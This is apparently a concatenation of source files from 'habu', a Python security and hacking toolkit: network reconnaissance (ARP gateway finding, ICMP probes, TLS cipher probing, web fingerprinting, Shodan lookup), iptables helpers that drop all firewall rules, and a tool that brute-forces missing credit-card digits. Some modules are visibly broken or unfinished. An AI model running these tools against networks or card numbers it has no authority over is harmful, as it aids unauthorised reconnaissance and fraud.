        print(qname)


        #if qname in self.cfg['registers'].keys():
        answer = RR(qname, QTYPE.A, rdata=A(self.address), ttl=30)
        reply.add_answer(answer)

        #if self.regex_sha224.match(qn.split('.')[0]):
        #    sha224 = qn.split('.')[0]
        #    ip_file = self.datadir / sha224

        #    if ip_file.is_file() and (time.time() - ip_file.stat().st_mtime) < self.cfg['ttl']:
        #        with ip_file.open() as ipf:
        #            ip = ipf.read()
        #            answer = RR(qname, QTYPE.A, rdata=A(ip), ttl=30)
        #            reply.add_answer(answer)

        return reply


@click.command()
#@click.argument('ip')
@click.option('-i', 'iface', default=None, help='Interface to take addresses from')
@click.option('-4', 'ipv4', is_flag=True, default=False, help='Send IPv4 (A) responses')
@click.option('-6', 'ipv6', is_flag=True, default=False, help='Send IPv6 (AAAA) responses')
#@click.option('-t', 'timeout', default=2, help='Timeout in seconds (default: 2)')
#@click.option('-w', 'wait', default=1, help='How many seconds between packets (default: 1)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_dnsd(iface, ipv4, ipv6, verbose):

    if not ipv4 and not ipv6:
        print('You need to set at least one parameter -4 / -6')
        sys.exit(1)

    ifaces = { x[3] for x in conf.route.routes }
    ifaces = ifaces & { x[3] for x in conf.route6.routes }

    if not iface:
        iface = conf.iface

    if iface not in ifaces:
        print(iface, 'is an invalid iface, valid ifaces are: ', ifaces)
        sys.exit(1)

    if ipv4:
        addr4 = [x[4] for x in conf.route.routes if x[2] != '0.0.0.0' and x[3] == iface][0]
        if not addr4:
            print("IPv4 address not found")

    if ipv6:
        addr6 = [x[4] for x in conf.route6.routes if x[1] == 0 and x[3] == iface][0][-1]
        if not addr6:
            print("IPv6 address not found")

    print(addr4)
    print(addr6)

    sys.exit(0)

    resolver = MyResolver(addr4=addr4, addr6=addr6)

    server = DNSServer(
        resolver,
        port=53,
        address="0.0.0.0"
    )

    server.start_thread()
    #drop_privileges(sys.argv[1])

    while server.isAlive():
        time.sleep(1)


    return True

if __name__ == '__main__':
    cmd_dnsd()



#!/usr/bin/env python3

import click

from habu.lib.hasher import ALGOS, hasher


@click.command()
@click.argument('f', type=click.File('rb'), default='-')
@click.option('-a', 'algorithm', default=None, type=click.Choice(ALGOS), help='Only this algorithm (Default: all)')
def cmd_hasher(f, algorithm):
    """Compute various hashes for the input data, that can be a file or a stream.

    Example:

    \b
    $ habu.hasher README.rst
    md5          992a833cd162047daaa6a236b8ac15ae README.rst
    ripemd160    0566f9141e65e57cae93e0e3b70d1d8c2ccb0623 README.rst
    sha1         d7dbfd2c5e2828eb22f776550c826e4166526253 README.rst
    sha256       6bb22d927e1b6307ced616821a1877b6cc35e... README.rst
    sha512       8743f3eb12a11cf3edcc16e400fb14d599b4a... README.rst
    whirlpool    96bcc083242e796992c0f3462f330811f9e8c... README.rst

    You can also specify which algorithm to use. In such case, the output is
    only the value of the calculated hash:

    \b
    $ habu.hasher -a md5 README.rst
    992a833cd162047daaa6a236b8ac15ae README.rst
    """

    data = f.read()

    if not data:
        print("Empty file or string!")
        return 1

    if algorithm:
        print(hasher(data, algorithm)[algorithm], f.name)
    else:
        for algo, result in hasher(data).items():
            print("{:<12} {} {}".format(algo, result, f.name))


if __name__ == '__main__':
    cmd_hasher()




from habu.lib import delegator
import ipaddress
import sys

class FirewallIPTables():

    def __init__(self):
        self.verbose = False

    def disable(self):
        commands = [
            'iptables -X',
            'iptables -F',
            'iptables -Z',
            'iptables -P INPUT ACCEPT',
            'iptables -P OUTPUT ACCEPT',
            'iptables -P FORWARD ACCEPT',
        ]

        for command in commands:
            if self.verbose:
                print(command)
            if delegator.run(command, block=True).return_code != 0:
                sys.stderr.write('Error. Do you have sufficient privileges?\n')
                return False

        return True

    def stealth(self):
        delegator.run('iptables -X')
        delegator.run('iptables -F')
        delegator.run('iptables -Z')
        delegator.run('iptables -P INPUT DROP')
        delegator.run('iptables -P OUTPUT ACCEPT')
        delegator.run('iptables -P FORWARD DROP')
        delegator.run('iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT')

    def no_rst(self):
        commands = [
            'iptables -A OUTPUT -p tcp --tcp-flags rst rst -j DROP',
        ]

        for command in commands:
            if self.verbose:
                print(command)
            if delegator.run(command, block=True).return_code != 0:
                sys.stderr.write('Error. Do you have sufficient privileges?\n')
                return False

        return True

    def forward_enable():
        for f in ['/proc/sys/net/ipv4/ip_forward', '/proc/sys/net/ipv6/conf/all/forwarding']:
            with open(f, 'w') as target:
                target.write(1)

    def forward_disable():
        for f in ['/proc/sys/net/ipv4/ip_forward', '/proc/sys/net/ipv6/conf/all/forwarding']:
            with open(f, 'w') as target:
                target.write(0)

'''
    def disable(self):


  IPV4_PATH = "/proc/sys/net/ipv4"
  IP_FORWARD_PATH = IPV4_PATH + "/ip_forward"
  ICMP_BCAST_PATH = IPV4_PATH + "/icmp_echo_ignore_broadcasts"
  SEND_REDIRECTS_PATH = IPV4_PATH + "/conf/all/send_redirects"
  IPV6_PATH = "/proc/sys/net/ipv6"
  IPV6_FORWARD_PATH = IPV6_PATH + "/conf/all/forwarding"

  # If +enabled+ is true will enable packet forwarding, otherwise it will
  # disable it.
  def enable_ipv6_forwarding(enabled)
    File.open(IPV6_FORWARD_PATH,'w') { |f| f.puts "#{enabled ? 1 : 0}"}
  end

  # If +enabled+ is true will enable packet forwarding, otherwise it will
  # disable it.
  def enable_forwarding(enabled)
    File.open(IP_FORWARD_PATH,'w') { |f| f.puts "#{enabled ? 1 : 0}" }
  end

  # Return true if packet forwarding is currently enabled, otherwise false.
  def forwarding_enabled?
    File.open(IP_FORWARD_PATH) { |f| f.read.strip == '1' }
  end

  # Return true if packet forwarding for IPv6 is currently enabled, otherwise false.
  def ipv6_forwarding_enabled?
    File.open(IPV6_FORWARD_PATH) { |f| f.read.strip == '1' }
  end

  # If +enabled+ is true will enable packet icmp_echo_ignore_broadcasts, otherwise it will
  # disable it.
  def enable_icmp_bcast(enabled)
    File.open(ICMP_BCAST_PATH,'w') { |f| f.puts "#{enabled ? 1 : 0}" }
  end

  # If +enabled+ is true will enable send_redirects, otherwise it will
  # disable it.
  def enable_send_redirects(enabled)
    File.open(SEND_REDIRECTS_PATH,'w') { |f| f.puts "#{enabled ? 1 : 0}" }
  end

  # Apply the +r+ BetterCap::Firewalls::Redirection port redirection object.
  def add_port_redirection( r, use_ipv6 )
    table = 'iptables'
    cal_dst_address = r.dst_address
    if use_ipv6
      table = 'ip6tables'
      # Prevent sending out ICMPv6 Redirect packets.
      Shell.execute("#{table} -I OUTPUT -p icmpv6 --icmpv6-type redirect -j DROP")

      # Ipv6 uses a different ip + port representation
      cal_dst_address = "[#{r.dst_address}]"
    end
    # accept all
    Shell.execute("#{table} -P FORWARD ACCEPT")
    # add redirection
    Shell.execute("#{table} -t nat -A PREROUTING -i #{r.interface} -p #{r.protocol} #{r.src_address.nil? ? '' : "-d #{r.src_address}"} --dport #{r.src_port} -j DNAT --to #{cal_dst_address}:#{r.dst_port}")
  end

  # Remove the +r+ BetterCap::Firewalls::Redirection port redirection object.
  def del_port_redirection( r, use_ipv6 )
    table = 'iptables'
    cal_dst_address = r.dst_address
    if use_ipv6
      table = 'ip6tables'
      # Ipv6 uses a different ip + port representation
      cal_dst_address = "[#{r.dst_address}]"
    end
    # remove redirection
    Shell.execute("#{table} -t nat -D PREROUTING -i #{r.interface} -p #{r.protocol} #{r.src_address.nil? ? '' : "-d #{r.src_address}"} --dport #{r.src_port} -j DNAT --to #{cal_dst_address}:#{r.dst_port}")
  end
end
end
end
'''



#!/usr/bin/env python3

import base64
import json
from pathlib import Path
import logging
import click
import pwd
import os
import requests
from Crypto import Random
from Crypto.Hash import SHA224
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5


@click.command()
@click.option('-u', 'url', default='https://asydns.org', help='API URL')
@click.option('-g', 'generate', is_flag=True, default=False, help='Force the generation of a new key pair')
@click.option('-r', 'revoke', is_flag=True, default=False, help='Revoke the public key')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_asydns(url, generate, revoke, verbose):
    """Requests a DNS domain name based on public and private
    RSA keys using the AsyDNS protocol https://github.com/portantier/asydns

    Example:

    \b
    $ habu.asydns -v
    Generating RSA key ...
    Loading RSA key ...
    {
        "ip": "181.31.41.231",
        "name": "07286e90fd6e7e6be61d6a7919967c7cf3bbfb23a36edbc72b6d7c53.a.asydns.org"
    }

    \b
    $ dig +short 07286e90fd6e7e6be61d6a7919967c7cf3bbfb23a36edbc72b6d7c53.a.asydns.org
    181.31.41.231
    """

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    homedir = Path(pwd.getpwuid(os.getuid()).pw_dir)

    dotdir = homedir / '.asydns'
    dotdir.mkdir(exist_ok=True)

    pub_file = dotdir / 'rsa.pub'
    key_file = dotdir / 'rsa.key'

    if generate or not key_file.is_file():

        logging.info('Generating RSA key ...')
        random_generator = Random.new().read
        key = RSA.generate(2048, random_generator)
        pub = key.publickey()

        with key_file.open('w') as k:
            k.write(key.exportKey('PEM').decode())

        with pub_file.open('w') as p:
            p.write(pub.exportKey('PEM').decode())


    logging.info('Loading RSA key ...')
    with key_file.open() as k:
        key = RSA.importKey(k.read())

    with pub_file.open() as p:
        pub = RSA.importKey(p.read())


    r = requests.get(url + '/api')

    if r.status_code != 200:
        logging.error('Error')
        logging.error(r.content.decode())
        return False

    j = r.json()

    challenge = base64.b64decode(j['challenge'])
    signer = PKCS1_v1_5.new(key)
    response = signer.sign(SHA224.new(challenge))
    response = base64.b64encode(response).decode()

    if revoke:
        r = requests.delete(url + '/api', json={'pub': pub.exportKey('PEM').decode(), 'challenge' : j['challenge'], 'response': response})
    else:
        r = requests.post(url + '/api', json={'pub': pub.exportKey('PEM').decode(), 'challenge' : j['challenge'], 'response': response})

    if r.status_code != 200:
        logging.error('Error')
        logging.error(r.content.decode())
        return False

    print(json.dumps(r.json(), indent=4))

    return True

if __name__ == '__main__':
    cmd_asydns()




import logging
from time import sleep

import socket

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import ICMP, IP, conf, sr1, L3RawSocket, sniff

def packet_callback(packet):
    print(packet.summary())

@click.command()
#@click.argument('ip')
#@click.option('-i', 'interface', default=None, help='Wich interface to use (default: auto)')
@click.option('-a', 'address', default='127.0.0.1', help='Wich address to bind (default: 127.0.0.1)')
@click.option('-p', 'port', default=8080, help='Wich port to use (default: 8080)')
#@click.option('-t', 'timeout', default=2, help='Timeout in seconds (default: 2)')
#@click.option('-w', 'wait', default=1, help='How many seconds between packets (default: 1)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_tcproxy(address, port, verbose):

    #if interface:
    #    conf.iface = interface

    #s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setblocking(0)
    sock.bind((address, port))
    sock.listen(3)
    self.lsock.append(sock)
    print('[*] Listening on {0} {1}'.format(address, port))
    while True:
        readable, writable, exceptional = select.select(self.lsock, [], [])
        for s in readable:
            if s == sock:
                rserver =self.remote_conn()
                if rserver:
                    client, addr = sock.accept()
                    print('Accepted connection {0} {1}'.format(addr[0], addr[1]))
                    self.store_sock(client, addr, rserver)
                    break
                else:
                    print('the connection with the remote server can\'t be \
                    established')
                    print('Connection with {} is closed'.format(addr[0]))
                    client.close()
            data = self.received_from(s, 3)
            self.msg_queue[s].send(data)
            if len(data) == 0:
                self.close_sock(s)
                break
            else:
                print('Received {} bytes from client '.format(len(data)))
                self.hexdump(data)

    return True

if __name__ == '__main__':
    cmd_tcproxy()



#!/usr/bin/env python3

import logging
import os
import os.path
import pwd

import requests
import requests_cache


def shodan_get_result(ip, api_key, no_cache=False, verbose=False):

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    if not no_cache:
        homedir = pwd.getpwuid(os.getuid()).pw_dir
        requests_cache.install_cache(homedir + '/.habu_requests_cache')

    url = 'https://api.shodan.io/shodan/host/{}?key={}'.format(ip, api_key)

    r = requests.get(url)

    if r.status_code not in [200, 404]:
        logging.error(str(r))
        return {}

    if r.status_code == 404:
        return {}

    data = r.json()

    return data



import socket
import ssl
from pprint import pprint

#context = ssl.create_default_context()

#context = ssl.SSLContext()
#context = ssl.SSLContext(protocol=ssl.PROTOCOL_TLSv1_1)
#context.verify_mode = ssl.CERT_REQUIRED
#context.check_hostname = True

#pprint(context.get_ciphers())

'''
 {'aead': False,
  'alg_bits': 128,
  'auth': 'auth-rsa',
  'description': 'CAMELLIA128-SHA         SSLv3 Kx=RSA      Au=RSA  '
                 'Enc=Camellia(128) Mac=SHA1',
  'digest': 'sha1',
  'id': 50331713,
  'kea': 'kx-rsa',
  'name': 'CAMELLIA128-SHA',
  'protocol': 'SSLv3',
  'strength_bits': 128,
  'symmetric': 'camellia-128-cbc'}]
'''

ciphers = ssl.SSLContext().get_ciphers()

for cipher in ciphers:

    #if cipher['protocol'] != 'TLSv1.2':
    #    continue

    context = ssl.SSLContext()
    #context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    #context = ssl.SSLContext(protocol=ssl.PROTOCOL_TLSv1_1)
    context.set_ciphers(cipher['name'])

    try:
        conn = context.wrap_socket(socket.socket(socket.AF_INET), server_hostname="www.securetia.com")
        conn.connect(("www.securetia.com", 443))
        print(cipher['description'])
    except Exception:
        pass
        #print(cipher['name'], 'ERROR')

#cert = conn.getpeercert()





#!/usr/bin/env python3

import sys
import logging

import click


def luhn_validate(number):
    """ Source code from: https://en.wikipedia.org/wiki/Luhn_algorithm"""

    sum = 0
    parity = len(number) % 2
    for i, digit in enumerate([int(x) for x in number]):
        if i % 2 == parity:
            digit *= 2
            if digit > 9:
                digit -= 9
        sum += digit
    return sum % 10 == 0


@click.command()
@click.argument('number')
def cmd_crack_luhn(number):
    """Having known values for a Luhn validated number, obtain the possible unknown numbers.

    Numbers that use the Luhn algorithm for validation are Credit Cards, IMEI,
    National Provider Identifier in the United States, Canadian Social
    Insurance Numbers, Israel ID Numbers and Greek Social Security Numbers (ΑΜΚΑ).

    The '-' characters are ignored.

    Define the missing numbers with the 'x' character.

    Reference: https://en.wikipedia.org/wiki/Luhn_algorithm

    Example:

    \b
    $ habu.crack.luhn 4509-xxxx-3160-6445
    """

    number = number.replace('-', '')
    unknown_count = number.count('x')

    if not number.replace('x', '').isdigit():
        print('Invalid format. Please, read the documentation.', file=sys.stderr)
        sys.exit(1)

    for n in range(10 ** unknown_count):
        candidate = number
        for item in '{:0{count}}'.format(n, count=unknown_count):
            candidate = candidate.replace('x', item, 1)
        if luhn_validate(candidate):
            print(candidate)


if __name__ == '__main__':
    cmd_crack_luhn()




#!/usr/bin/env python3

import json
import sys

import click

from pathlib import Path

from habu.lib.loadcfg import loadcfg


@click.command()
@click.argument('key')
@click.argument('value')
def cmd_config_set(key, value):
    """Set VALUE to the config KEY.

    Note: By default, KEY is converted to uppercase.

    Example:

    \b
    $ habu.config.set DNS_SERVER 8.8.8.8
    """

    habucfg = loadcfg(environment=False)
    habucfg[key.upper()] = value
    with Path('~/.habu.json').expanduser().open('w') as f:
        f.write(json.dumps(habucfg, indent=4, sort_keys=True))


if __name__ == '__main__':
    cmd_config_set()




import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import ICMP, IP, TCP, conf, icmpcodes, sr, sr1


@click.command()
@click.argument('ip')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_icmp(ip, verbose):

    conf.verb = False

    #pkts = IP(dst=ip) / TCP(flags=(0, 255), dport=port)
    pkt = IP(dst=ip) / ICMP()# , proto=(0, 255)) # / TCP(flags=(0, 255), dport=port)


    messages = [
        (8, 0),  # echo request
        (13, 0), # timestamp
        (15, 0), # info request
        #(), #
        #(), #
    ]

    #print(pkts.summary())
    #print(pkts.show2())

    #print(icmpcodes)

    for itype, icode in messages:
        pkt[ICMP].type = itype
        pkt[ICMP].code = icode
        ans = sr1(pkt, timeout=0.2)
        if ans:
            print(ans.show())
    #    for icode in range(0, 256):
    #        print(itype, icode)
        else:
            print("NOT ANSWER!!!")

    out = "{:>8} -> {:<8}"


    '''
    for pkt in pkts:
        #if not flags or all(i in pkt.sprintf(r"%TCP.flags%") for i in flags):
        print(pkt.show2())
        ans = sr1(pkt, timeout=0.2)
        if ans:
            #if not rflags or all(i in ans.sprintf(r"%TCP.flags%") for i in rflags):
            #print(out.format(pkt.sprintf(r"%TCP.flags%"), ans.sprintf(r"%TCP.flags%")))
            print(ans.show())
    '''

    return True

if __name__ == '__main__':
    cmd_icmp()



#!/usr/bin/env python3
import json
import logging
import sys

import click

from habu.lib.ip import get_internal_ip


@click.command()
@click.option('-v', 'verbose', is_flag=True, default=False,
              help='Verbose output.')
def cmd_ip_internal(verbose):
    """Get the local IP address(es) of the local interfaces.

    Example:

    \b
    $ habu.ip.internal
    {
      "lo": {
        "ipv4": [
          {
            "addr": "127.0.0.1",
            "netmask": "255.0.0.0",
            "peer": "127.0.0.1"
          }
        ],
        "link_layer": [
          {
            "addr": "00:00:00:00:00:00",
            "peer": "00:00:00:00:00:00"
          }
        ],
        "ipv6": [
          {
            "addr": "::1",
            "netmask": "ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"
          }
        ]
      },
    ...
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')
        print("Gathering NIC details...", file=sys.stderr)

    result = get_internal_ip()

    if result:
        print(json.dumps(result, indent=4))
    else:
        print("[X] Unable to get detail about the interfaces")

    return True


if __name__ == '__main__':
    cmd_ip_internal()



#!/usr/bin/env python3

import sys

import click

from habu.lib.xor import xor
from habu.config import config

from habu.lib.loadcfg import loadcfg

from cryptography.fernet import Fernet

ERROR_NOKEY = '''A key must be provided. You have the following options:
    1. Use the -k option with a valid key
    2. Save an existing key to ~/.habu.json file (variable FERNET_KEY)
    3. Export the environment variable HABU_FERNET_KEY

To generate a valid key, you can use habu.fernet.genkey
'''


@click.command()
@click.option('-k', 'key', default=None, help='Key')
@click.option('-d', 'decrypt', is_flag=True, default=False, help='Decrypt instead of encrypt')
@click.option('--ttl', 'ttl', default=0, type=click.INT, help='Time To Live for timestamp verification')
@click.option('-i', type=click.File('rb'), default='-', help='Input file (default: stdin)')
@click.option('-o', type=click.File('wb'), default='-', help='Output file (default: stdout)')
def cmd_fernet(key, decrypt, ttl, i, o):
    """Fernet cipher.

    Uses AES-128-CBC with HMAC

    Note: You must use a key to cipher with Fernet.

    Use the -k paramenter or set the FERNET_KEY configuration value.

    The keys can be generated with the command habu.fernet.genkey

    Reference: https://github.com/fernet/spec/blob/master/Spec.md

    Example:

    \b
    $ "I want to protect this string" | habu.fernet
    gAAAAABbXnCGoCULLuVNRElYTbEcwnek9iq5jBKq9JAN3wiiBUzPqpUgV5oWvnC6xfIA...

    \b
    $ echo gAAAAABbXnCGoCULLuVNRElYTbEcwnek9iq5jBKq9JAN3wiiBUzPqpUgV5oWvnC6xfIA... | habu.fernet -d
    I want to protect this string
    """

    habucfg = loadcfg()

    if not key:
        if 'FERNET_KEY' in habucfg:
            key = habucfg['FERNET_KEY']
        else:
            print(ERROR_NOKEY, file=sys.stderr)
            sys.exit(1)

    if not ttl:
        ttl=None

    cipher = Fernet(key)

    data = i.read()

    if decrypt:
        try:
            token = cipher.decrypt(data, ttl)
        except Exception as e:
            print("Error decrypting", file=sys.stderr)
            sys.exit(1)
    else:
        token = cipher.encrypt(data)

    print(token.decode(), end='')

if __name__ == '__main__':
    cmd_fernet()




#!/usr/bin/env python3

import json
import warnings

import click
from ipwhois import IPWhois


@click.command()
@click.argument('ip')
def cmd_whois_ip(ip):
    """Simple whois client to check IP addresses (IPv4 and IPv6).

    Example:

    \b
    $ habu.whois.ip 8.8.8.8
    {
        "nir": null,
        "asn_registry": "arin",
        "asn": "15169",
        "asn_cidr": "8.8.8.0/24",
        "asn_country_code": "US",
        "asn_date": "1992-12-01",
        "asn_description": "GOOGLE - Google LLC, US",
        "query": "8.8.8.8",
        ...
    """

    warnings.filterwarnings("ignore")

    obj = IPWhois(ip)
    data = obj.lookup_rdap()

    print(json.dumps(data, indent=4))


if __name__ == '__main__':
    cmd_whois_ip()



#!/usr/bin/env python3

import shlex
import subprocess
import sys
from pathlib import Path
from shutil import which
from time import sleep

DURATION = 20

def web_screenshot(url, outfile, browser=None):
    """Create a screenshot of a website."""

    valid_browsers = ['firefox', 'chromium-browser']
    available_browsers = [ b for b in valid_browsers if which(b) ]

    if not available_browsers:
        print("You don't have firefox or chromium-browser in your PATH".format(browser), file=sys.stderr)
        return False

    if not browser:
        browser = available_browsers[0]

    if browser not in available_browsers:
        print("You don't have {} in your PATH".format(browser), file=sys.stderr)
        return False

    #screenshot_cmd = ''
    #profile_firefox = shlex.split('firefox --new-instance --CreateProfile habu.web.screenshot')
    #screenshot_firefox = shlex.split('firefox --new-instance --headless -P habu.web.screenshot --screenshot {} {}'.format(outfile, url))
    #screenshot_chromium = shlex.split('chromium-browser --headless --disable-gpu --window-size=1440,900 --screenshot={} {}'.format(outfile, url))

    if browser == 'firefox':
        profile_firefox = shlex.split('firefox --new-instance --CreateProfile habu.web.screenshot')
        subprocess.Popen(profile_firefox, stderr=subprocess.DEVNULL)
        screenshot_cmd = shlex.split('firefox --new-instance --headless -P habu.web.screenshot --screenshot {} {}'.format(outfile, url))

    if browser == 'chromium-browser':
        screenshot_cmd = shlex.split('chromium-browser --headless --disable-gpu --window-size=1440,900 --screenshot={} {}'.format(outfile, url))

    outfile = Path(outfile)
    if outfile.is_file():
        outfile.unlink()

    with subprocess.Popen(screenshot_cmd, stderr=subprocess.DEVNULL) as proc:

        for count in range(DURATION):

            sleep(1)

            if outfile.is_file():
                break

            if count == DURATION - 1:
                print("Unable to create screenshot", file=sys.stderr)
                break

        proc.kill()

    return True




"""Collect details bout the host where habu is running."""
import platform
import socket


def gather_details():
    """Get details about the host that is executing habu."""
    try:
        data = {
            'kernel': platform.uname(),
            'distribution': platform.linux_distribution(),
            'libc': platform.libc_ver(),
            'arch': platform.machine(),
            'python_version': platform.python_version(),
            'os_name': platform.system(),
            'static_hostname': platform.node(),
            'cpu': platform.processor(),
            'fqdn': socket.getfqdn(),
        }
    except AttributeError:
        return {}

    return data



#!/usr/bin/env python3

import json
import sys

import click

from habu.lib.loadcfg import loadcfg


@click.command()
@click.option('--show-keys', is_flag=True, default=False, help='Show also the key values')
@click.option('--option', nargs=2, help='Write to the config(KEY VALUE)')
def cmd_config_show(option, show_keys):
    """Show the current config.

    Note: By default, the options with 'KEY' in their name are shadowed.

    Example:

    \b
    $ habu.config.show
    {
        "DNS_SERVER": "8.8.8.8",
        "FERNET_KEY": "*************"
    }
    """

    habucfg = loadcfg()

    if not show_keys:
        for key in habucfg.keys():
            if 'KEY' in key:
                habucfg[key] = '*************'

    print(json.dumps(habucfg, indent=4, sort_keys=True, default=str))


if __name__ == '__main__':
    cmd_config_show()




#!/usr/bin/env python3

import json

import click

from habu.lib.web_tech import web_tech


@click.command()
@click.argument('url')
@click.option('-c', 'no_cache', is_flag=True, default=False, help='Disable cache')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_web_tech(url, no_cache, verbose):
    """Use Wappalyzer apps.json database to identify technologies used on a web application.

    Reference: https://github.com/AliasIO/Wappalyzer

    Note: This tool only sends one request. So, it's stealth and not suspicious.

    \b
    $ habu.web.tech https://woocomerce.com
    {
        "Nginx": {
            "categories": [
                "Web Servers"
            ]
        },
        "PHP": {
            "categories": [
                "Programming Languages"
            ]
        },
        "WooCommerce": {
            "categories": [
                "Ecommerce"
            ],
            "version": "6.3.1"
        },
        "WordPress": {
            "categories": [
                "CMS",
                "Blogs"
            ]
        },
    }
    """

    response = web_tech(url, no_cache, verbose)
    print(json.dumps(response, indent=4))


if __name__ == '__main__':
    cmd_web_tech()



#!/usr/bin/env python3

import logging
import re
from time import sleep

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import ARP, IP, TCP, ICMP, Ether, conf, srp


@click.command()
@click.argument('network')
@click.option('-i', 'iface', default=None, help='Interface to use')
@click.option('--host', default='8.8.8.8', help='Host to reach (default: 8.8.8.8)')
@click.option('--tcp', is_flag=True, default=False, help='Use TCP instead of ICMP')
@click.option('--dport', default='80', type=click.IntRange(1, 65535), help='Destination port for TCP (default: 80)')
@click.option('--timeout', default=5, help='Timeout in seconds (default: 5)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_gateway_find(network, iface, host, tcp, dport, timeout, verbose):
    """
    Try to reach an external IP using any host has a router.

    Useful to find routers in your network.

    First, uses arping to detect alive hosts and obtain MAC addresses.

    Later, create a network packet and put each MAC address as destination.

    Last, print the devices that forwarded correctly the packets.

    Example:

    \b
    # habu.find.gateway 192.168.0.0/24
    192.168.0.1 a4:08:f5:19:17:a4 Sagemcom
    192.168.0.7 b0:98:2b:5d:22:70 Sagemcom
    192.168.0.8 b0:98:2b:5d:1f:e8 Sagemcom
    """

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    conf.verb = False

    if iface:
        conf.iface = iface

    res, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=network), timeout=2)

    neighbors = set()

    for _, pkt in res:
        neighbors.add((pkt['Ether'].src, pkt['Ether'].psrc))

    for mac,ip in neighbors:
        if tcp:
            res, unans = srp(Ether(dst=mac)/IP(dst=host)/TCP(dport=dport), timeout=timeout)
        else:
            res, unans = srp(Ether(dst=mac)/IP(dst=host)/ICMP(), timeout=timeout)
        for _,pkt in res:
            if pkt:
                if verbose:
                    print(pkt.show())
                else:
                    print(ip, mac, conf.manufdb._get_manuf(mac))


if __name__ == '__main__':
    cmd_gateway_find()



#!/usr/bin/env python3

import json
import logging
import socket

import click
import regex as re


def extract_hostname(data):

    regexp = re.compile(r"([a-zA-Z0-9_.-]+)")

    match = regexp.finditer(data)

    result = set()

    for m in match:
        candidate = m.group(0).lower()

        if '.' not in candidate:
            continue

        if not re.match('[a-z]+', candidate):
            continue

        if not re.match('[a-z0-9]+\.[a-z0-9]', candidate):
            continue

        result.add(candidate)

    return list(result)


@click.command()
@click.argument('infile', type=click.File('r'), default='-')
@click.option('-c', 'check', is_flag=True, default=False, help='Check if hostname resolves')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
@click.option('-j', 'jsonout', is_flag=True, default=False, help='JSON output')
def cmd_extract_hostname(infile, check, verbose, jsonout):
    """Extract hostnames from a file or stdin.

    Example:

    \b
    $ cat /var/log/some.log | habu.extract.hostname
    www.google.com
    ibm.com
    fileserver.redhat.com
    """

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    data = infile.read()

    result = extract_hostname(data)

    if check:
        logging.info('Checking against DNS...')
        for candidate in result:
            try:
                socket.getaddrinfo(candidate, None)
            except socket.gaierror:
                result.remove(candidate)

    if jsonout:
        print(json.dumps(result, indent=4))
    else:
        print('\n'.join(result))


if __name__ == '__main__':
    cmd_extract_hostname()



#!/usr/bin/env python3
"""Habu Python Wrapper setup script."""
import os
import sys
import glob

from pathlib import Path
from setuptools import setup

here = os.path.abspath(os.path.dirname(__file__))

with open(os.path.join(here, 'README.rst'), encoding='utf-8') as readme_file:
    readme = readme_file.read()

entries = []

for file in sorted(Path('habu/cli/').glob('cmd_*.py')):
    cmd_file = file.stem
    cmd_name = cmd_file.replace('cmd_', 'habu.').replace('_', '.')
    entries.append("{cmd_name} = habu.cli.{cmd_file}:{cmd_file}".format(cmd_file=cmd_file, cmd_name=cmd_name))

setup(
    name='habu',
    version='0.1.10',
    description='Python Hacking Toolkit',
    long_description=readme,
    long_description_content_type='text/x-rst',
    author='Fabian Martinez Portantier',
    author_email='fabian@portantier.com',
    url='https://github.com/portantier/habu',
    license='BSD 3-clause',
    install_requires=[
        'beautifulsoup4',
        'cryptography',
        'click',
        'dnspython',
        'lxml',
        'netifaces',
        #'prompt_toolkit==1.0.15',
        'pygments',
        'regex',
        'requests',
        'requests-cache',
        'scapy',
        'websockets',
    ],
    tests_require=[
        'pytest',
        'pytest-runner',
    ],
    entry_points={
        'console_scripts': entries,
    },
    classifiers=[
        "Environment :: Console",
        "Intended Audience :: Developers",
        "Intended Audience :: Information Technology",
        "Intended Audience :: System Administrators",
        "License :: OSI Approved :: BSD License",
        "Topic :: Security",
        "Topic :: System :: Networking",
        "Programming Language :: Python :: 3.0",
        "Programming Language :: Python :: 3.7",
    ],
    packages=['habu', 'habu.lib', 'habu.lib.completeme', 'habu.cli'],
    include_package_data=True,
    keywords=['security'],
    zip_safe=False,
    test_suite='py.test',
)
